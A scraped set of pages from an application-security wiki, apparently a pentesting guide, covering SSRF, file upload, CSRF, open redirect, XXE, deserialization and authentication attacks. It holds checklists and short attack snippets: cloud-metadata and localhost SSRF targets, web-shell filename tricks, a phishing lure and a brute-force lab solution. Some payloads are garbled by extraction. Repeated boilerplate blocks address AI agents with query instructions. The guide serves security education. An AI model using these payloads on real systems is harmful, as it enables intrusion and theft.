authentication attacks include: \* Passwords or passphrases \* Multi-Factor Authentication (MFA) \* Session tokens \* Cookies \* Recovery questions and answers For more details on specific authentication attack techniques, see the relevant child pages. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf.md). # Server-side request forgery (SSRF) ## What is it? Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. It can be used by an attacker to interact with internal systems, possibly bypassing firewalls or accessing unauthorized data. \*\*A simple example\*\* A vulnerable web application uses a parameter to retrieve an image from a URL, i.e., \`/loadImage?url={imageURL}\`. An attacker can potentially change the \`{imageURL}\` to point to internal resources that should not be exposed, such as \`http://localhost/admin\` or \`http://internal-service/api/secrets\`. The impact of an SSRF vulnerability includes: \* Access to internal services and data \* Remote code execution \* Denial of Service (DoS) \*\*Other learning resources:\*\* \* PortSwigger: \* Swisskyrepo: \## Checklist \* \[ \] Identify all points where the application makes a server-side HTTP request \* \[ \] URL parameters \* \[ \] Form fields \* \[ \] HTTP headers \* \[ \] Examine the application's handling of URL redirection \* \[ \] Test different URI schemes http, https, file, ftp, etc. \* \[ \] Does the application accept IP addresses (e.g., 127.0.0.1) or localhost as the hostname? \* \[ \] Test for internal network interactions \* \[ \] Can you map out the internal network infrastructure (port scanning, banner grabbing)? \* \[ \] Test for remote file inclusion \* \[ \] Test for cloud metadata exposure (relevant for cloud-based services) Amazon AWS, Google Cloud, etc. \* \[ \] Is there a blocklist? \* \[ \] Can you bypass the blocklist? \* \[ \] Encoding Hostname obfuscation \* \[ \] Alternative IP notation (e.g. 127.0.0.1 in hex is 0x7f.0x0.0x0.0x1) \* \[ \] Hex, Hex with extra 0s, Octal, two numbers, three numbers, etc ## Exploitation \`\`\` # Basic internal interaction http://localhost/admin # Using alternative IP notation (for 127.0.0.1) http://2130706433 # Cloud metadata exposure (AWS) http://169.254.169.254/latest/meta-data/ \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/server-side-request-forgery-ssrf.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/java.md). # Java --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/java.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload.md). # Insecure file upload ## What is it? Insecure File Upload vulnerability is when an application allows uncontrolled and unvalidated upload of files. An attacker can exploit this vulnerability to upload malicious files, like web shells, which can lead to code execution, data leakage, or other types of attacks. \*\*A simple example\*\* An application allows users to upload profile pictures without validating the file type and content, or without properly handling the file storage. An attacker can upload a PHP shell script disguised as an image file. When this file is served by the server, the malicious script can be executed. The impact of insecure file uploads includes: \* Remote Code Execution (RCE) \* Data Leakage \* Server Compromise \*\*Other learning resources:\*\* \* OWASP: ; \* Swisskyrepo: \## Checklist \* \[ \] Understand the file upload functionality \* \[ \] Are there file type restrictions? \* \[ \] Are there file size restrictions? \* \[ \] Are files renamed after upload? \* \[ \] Are files checked for content type matching the extension? \* \[ \] Test for bypassing file extension filters \* \[ \] Upload a file with a double extension (e.g., .jpg.php) \* \[ \] Upload a file with a null byte injection (e.g., .php%00.jpg) \* \[ \] Test for malicious content within a file \* \[ \] Upload a file with a simple XSS payload in its content \* \[ \] Test for inadequate file storage handling \* \[ \] Are uploaded files accessible from the internet? (Path/URL guessing) \* \[ \] Can other users access the uploaded files? ## Exploitation \`\`\` # Bypass extension filters # Note: req server misconfig to execute or the ability to rename once it's up shell.php.jpg # Null byte injection shell.php%00.jpg # Blocklist bypass shell.php5 shell.phtml \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-file-upload.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/php.md). # PHP --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/php.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf.md). # Cross-Site Request Forgery (CSRF) ## What is it? CSRF, short for Cross-site request forgery, is a type of web security flaw that enables an attacker to trick users into executing actions they didn't intend to do. \*\*A simple example:\*\* \* A vulnerable web application has the endpoint \`/updateProfile?id={userid}\` \* When a \`POST\` request is made to this endpoint the application: \* Checks the ID is the current user \* If it is, update the profile with the provided information in the request body \* When the victim visits the attacker's malicious site, it will: \* Send a request to the vulnerable web application \* Because the user is logged into that application, the browser will include cookies (importantly, the session cookie) \* The vulnerable application processes the request as normal since it came from the user It's important to note that we need some user interaction for CSRF to work. Typically an attacker would place their payload on a site that they control, and try to entice the target with phishing emails, direct messages on social media, etc. Once the user clicks the link and lands on the page, the payload is triggered. CSRF defences are now pretty common, so along with just finding places where users can carry out actions, we also need to be able to bypass defences that have not been properly implemented. \*\*Other learning resources:\*\* \* PortSwigger: Web Security Academy \* The XSS Rat: Bug Bounty Beginner Methodology: CSRF \* Swisskeyrepo: \*\*Writeups:\*\* \* ## Checklist \* \[ \] Does every form have a CSRF token? \* \[ \] Can we use GET instead of POST (i.e. can our payload be in the URI instead of the body) \* \[ \] Test the token \* \[ \] Test without the token \* \[ \] Test other HTTP methods without the token (e.g. GET) \* \[ \] Test without the token value (keep the param name, e.g. \\&csrf=) \* \[ \] Test with a random token \* \[ \] Test a previous token \* \[ \] Test a token from a different session \* \[ \] Test with a token of the same length \* \[ \] Test for predictability \* \[ \] Test for static values \* \[ \] Test for known values (e.g. the token is the user-id) \* \[ \] Is the token tied to a cookie other than the session cookie? \* \[ \] Can the token be stolen with XSS? \* \[ \] Is the referer header being used to validate the request origin? \* \[ \] Do the cookies have SameSite set? (Chrome is lax by default) \* \[ \] Can we submit the request with GET? \* \[ \] Can we override HTTP methods with \\\`X-Http-Method-Override: GET\\\` \* \[ \] Can we override HTTP methods with \\\`\\\_method=POST\\\` ## Exploitation \`\`\` \`\`\` \`\`\` [Click Me](http://m/api/employees/add?name=) \`\`\` \`\`\` ![](http://api/employees/add?name=) \`\`\` \`\`\` document.location = 'https:///employees/add?name='; \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/cross-site-request-forgery-csrf.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect.md). # Open redirect ## What is it? An Open Redirect Vulnerability allows an attacker to redirect a user to an arbitrary website of the attacker's choosing. It occurs when an application incorporates user-supplied data into a URL which causes a redirection to that URL. This can be used to facilitate phishing attacks, steal sensitive information, or perform other malicious activities. \*\*A simple example\*\* Consider a website that uses a URL parameter to redirect the user to a specified page. For example: . An attacker could replace "" with a malicious site, then trick a user into following the crafted link. Open Redirects can lead to: Phishing attacks Disclosure of sensitive information Malware installation Execution of arbitrary scripts Other learning resources: OWASP: PortSwigger: \## \*\*Checklist\*\* \* \[ \] Does the application use redirection functions that include user-supplied input? \* \[ \] Are redirects implemented without validation of the target URL? \* \[ \] Can an attacker manipulate the redirection URL to point to an arbitrary domain? \* \[ \] Does the application append user-supplied input into the URL causing the redirection? ## Exploitation Craft an URL with redirection to a malicious site \`\`\` http://website.com/redirect?site=http://malicious-site.com \`\`\` Trick the user into clicking the link \`\`\` "You've won a prize! Click here to claim: http://website.com/redirect?site=http://malicious-site.com" \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/open-redirect.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization.md). # Insecure deserialization ## What is it? Insecure Deserialization attacks occur when an attacker is able to manipulate serialized (formatted for storage or transmission) objects in order to change the application's intended flow or to execute arbitrary code. These attacks exploit weaknesses in the way applications deserialize input data, typically by inserting malicious data that is interpreted as a valid object by the target system. Serialization is the process of turning an object into a format that can be transmitted or stored, and deserialization is the reverse process - turning serialized data back into an object. If an application doesn't properly validate or sanitize the serialized objects before deserializing them, it can lead to several types of attacks, such as: \* Remote Code Execution (RCE) \* Replay attacks \* Injection attacks \* Privilege escalation attacks Insecure deserialization can occur in any programming language that supports serialized objects, but some common languages where these vulnerabilities often occur include Java, PHP, Python, and .NET. For more details on specific insecure deserialization attacks and mitigations, see the relevant child pages. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups.md). # Authentication lab setup & writeups ## Lab setup {% hint style="info" %} Coming soon {% endhint %} ## Labs list #### Username enumeration via different responses PortSwigger | free | easy | \[link to lab\](https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses) Solution \`\`\` 1. Send a login request, capture it in BURP and send to intruder 2. Mark the payload areas for the username and password in the body of the request username=§test§&password=§test§ 3. Select 'Cluster Bomb' 4. In payloads, load in the provided username list for the first list, and the provided passwords list for the second list 5. Click 'Start Attack' 6. Order the results by Status code or length to view the valid credentials 7. Use these credentials to login and solve the lab \`\`\` \--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/authentication-lab-setup-and-writeups.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/python.md). # Python --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/python.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/.net.md). # .NET --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/insecure-deserialization/.net.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection.md). # XXE (XML external entity) injection ## What is it? XML External Entity (XXE) vulnerabilities occur when an application processes XML input that includes a reference to an external entity. This vulnerability can occur in any technology that parses XML. By exploiting an XXE vulnerability, an attacker can read local files on the server, interact with internal systems, or conduct denial of service attacks. \*\*A simple example\*\* A vulnerable application might parse XML input from a user without disabling external entities. An attacker could then send XML like the following: \`\`\` \]> &xxe; \`\`\` In this case, the XML parser will replace \`&xxe;\` with the contents of the \`/etc/passwd\` file and include it in the output. XXE can often lead to: \* Disclosure of internal files \* Server Side Request Forgery (SSRF) \* Denial of Service \* Remote Code Execution in some rare cases \*\*Other learning resources:\*\* \* PortSwigger: \* OWASP: \*\*Writeups:\*\* \* ## Checklist \*\*Objective\*\* \* \[ \] Identify endpoints that can process XML \* \[ \] Create a working XML payload that can be adapted to deliver exploits \* \[ \] Test identified endpoints for XXE \*\*Attack surface discovery\*\* \* \[ \] Identify endpoints that accept XML payloads \* \[ \] Review requests in proxy for XML data \* \[ \] Identify endpoints that accept JSON by sending XML \* \[ \] Identify endpoints that accept images by sending SVG images \* \[ \] Identify endpoints that accept documents by sending DOCX or PDF files \* \[ \] Test with the header \`Content-Type: application/xml\` \* \[ \] Verify working XML payloads that can be adapted to deliver exploits \* \[ \] Locate internal DTDs \*\*Testing\*\* \* \[ \] Test for external entities with a simple non-malicious payload \* \[ \] Test for external entities with an available file (e.g. for Linux /etc/passwd) \* \[ \] Test for external entities with an available endpoint you control (e.g. collaborator or webhook.site) \* \[ \] Test for external entities with other available endpoints \* \[ \] EC2 metadata endpoint \`http://169.254.169.254/latest/meta-data\` \* \[ \] Test filters and restrictions \* \[ \] Trigger error messages to exfiltrate information \* \[ \] Test for denial of service \* \[ \] Test for code execution \*\*Impact\*\* \* \[ \] Can we read sensitive files? \* \[ \] Configuration files \* \[ \] System files \* \[ \] SQLite files \* \[ \] SSH keys \* \[ \] Can we exfiltrate sensitive information? \* \[ \] Can we achieve code execution? ## Exploitation \*\*Sources\*\* \* My pentest notes \* PortSwigger \* PayloadsAllTheThings Detect XXE \`\`\`xml \]> &xxe; \`\`\` Include files\\ \\&#xNAN;\*Note:\* You might need \`"file:///etc/passwd"\` \`\`\`xml \]> &xxe; \`\`\` List files: \*Note:\* Restricted to Java applications \`\`\`xml \]> &xxe; \`\`\` Out-of-band: \`\`\`xml \]> &xxe; \`\`\` Parameter entities: \`\`\`xml %xxe; \]> \`\`\` Load an external DTD: \`\`\`xml "> %eval; %exfiltrate; \`\`\` Execute code \*Note:\* Only works in the PHP 'expect' module is available \`\`\`xml \]> &xxe; \`\`\` \*\*Include XML as a parameter value\*\* \`\`\`xml param= \`\`\` \*\*Other sources\*\* \* Fuzzing for XXE \* Fuzzing for local DTDs \--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication.md). # Attacking password-based authentication ## What is it? Password-based authentication generally allows to register an account and set a password, or sometimes an account will be assigned to them by an administrator. Password-based authentication tends to be suseptible to brute-force attacks, account lockouts and credential stuffing attacks. \*\*A simple example\*\* \* A vulnerable web application allows users to sign up and set a password. \* After 10 failed login attempts, an account is locked. \* If an attacker uses 9 common passwords against many user accounts, they will gain access to ones that chose weak or common passwords. Broken authentication can often lead to: \* Account takeover \* Sensitive data exposure \*\*Other learning resources:\*\* \* PortSwigger: \*\*Writeups:\*\* \*Have a good writeup & want to share it here? Drop me a message on LinkedIn.\* ## Checklist \* \[ \] Can we enumerate user accounts? \* \[ \] Registration page \* \[ \] Login page \* \[ \] Password reset page \* \[ \] Is there any brute-force protection? \* \[ \] Check for account lockouts \* \[ \] Check for rate limiting \* \[ \] Check for CAPTCHA \* \[ \] Check for MFA \* \[ \] What is the password policy? \* \[ \] Check the strength requirements \* \[ \] Is the password stored securely? (E.g. if we reset, will it send us the cleartext password) \* \[ \] Is the password reset token sufficiently unique? \* \[ \] Are credentials predictable? \* \[ \] Check for default credentials \* \[ \] Check for username conventions (E.g. firstname.lastname) \* \[ \] Is autocomplete enabled on password fields? \* \[ \] Check the password reset functionality \* \[ \] Knowledge-based questions \* \[ \] Token leakage via Referrer \* \[ \] Token predictability \* \[ \] Is authentication happening client-side? \* \[ \] Are there any backups or leaked files with creds? \* \[ \] Is there remember me or auto login functionality? \* \[ \] Are the tokens for this predictable? \* \[ \] How long does the token remain valid? \* \[ \] Are tokens or credentials passed via the URL? \* \[ \] Are there CSRF tokens? --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-password-based-authentication.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components.md). # Vulnerable components ## What is it? Pentesting vulnerable components in web applications refers to the process of identifying, analyzing, and testing potential weaknesses present in various components of a web application, such as libraries, frameworks, and other software modules. \*\*A simple example\*\* A web application may use an outdated version of jQuery, which is known to have vulnerabilities. If an attacker can exploit this vulnerability, they may be able to run arbitrary code on a user's browser, potentially leading to unauthorized access or data theft. \*\*Other learning resources:\*\* \* OWASP Top 10: \* CWE/SANS Top 25: \* Web Application Security Testing Cheat Sheet: \## Checklist \* \[ \] What components exist? \* \[ \] What does the technology stack look like? (libraries, frameworks, etc.) \* \[ \] Identify all plugins and extensions used \* \[ \] Is it a CMS with plugins? \* \[ \] Identify the versions of all these components \* \[ \] Are there known vulnerabilities for those components? \* \[ \] NVD, exploit-db, dependency checker, etc \* \[ \] Do the exploits have PoCs or available exploits? \* \[ \] Can we validate the vulnerability? \* \[ \] If not, what other protections need to be bypassed? --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/vulnerable-components.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa.md). # Attacking MFA ## What is it? Multi-Factor Authentication (MFA) is a method of confirming a user's identity by using multiple pieces of evidence (factors), typically something they know (like a password), something they have (like a physical token or a mobile device), and something they are (like biometric data). \*\*A simple example\*\* A web application requests a password (first factor - something the user knows), then a one-time password sent to a mobile device (second factor - something the user has). An attacker could attempt to bypass MFA by stealing both the user's password and the OTP, or by exploiting vulnerabilities in the MFA implementation. Common MFA bypass techniques can include: \* Phishing attacks to collect both factors \* Exploiting insecure backup/recovery methods \* Man-in-the-middle attacks \* Exploiting implementation weaknesses \*\*Other learning resources:\*\* \* OWASP: \* Duo Security: \* Google Authenticator: \## Checklist \* \[ \] Understand the MFA implementation \* \[ \] What factors are used? \* \[ \] What backup/recovery methods exist? \* \[ \] Is there a fall-back option to less secure methods? \* \[ \] Go through the MFA processes \* \[ \] Initial enrollment process \* \[ \] Login process with MFA \* \[ \] Recovery/Backup process \* \[ \] Deactivation process \* \[ \] Are there any implementation weaknesses? \* \[ \] Does the application allow "remember me" functionality? \* \[ \] Can OTPs be predicted or intercepted? \* \[ \] Are session tokens securely handled? \* \[ \] Is there a secure lockout mechanism after multiple failed attempts? \* \[ \] Can we bypass MFA? \* \[ \] Can we bruteforce the token? \* \[ \] Exploiting insecure backup/recovery methods \* \[ \] Can a new device be added without proper verification? \* \[ \] Is there any notification on registration of a new device? \* \[ \] Can the notification be suppressed? \* \[ \] Are there any backdoors? \* \[ \] Is there an alternative login flow that bypasses MFA? \* \[ \] Is there a less secure service that doesn't require MFA but grants similar access? \* \[ \] Are there any APIs or resources that do not enforce MFA? --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET 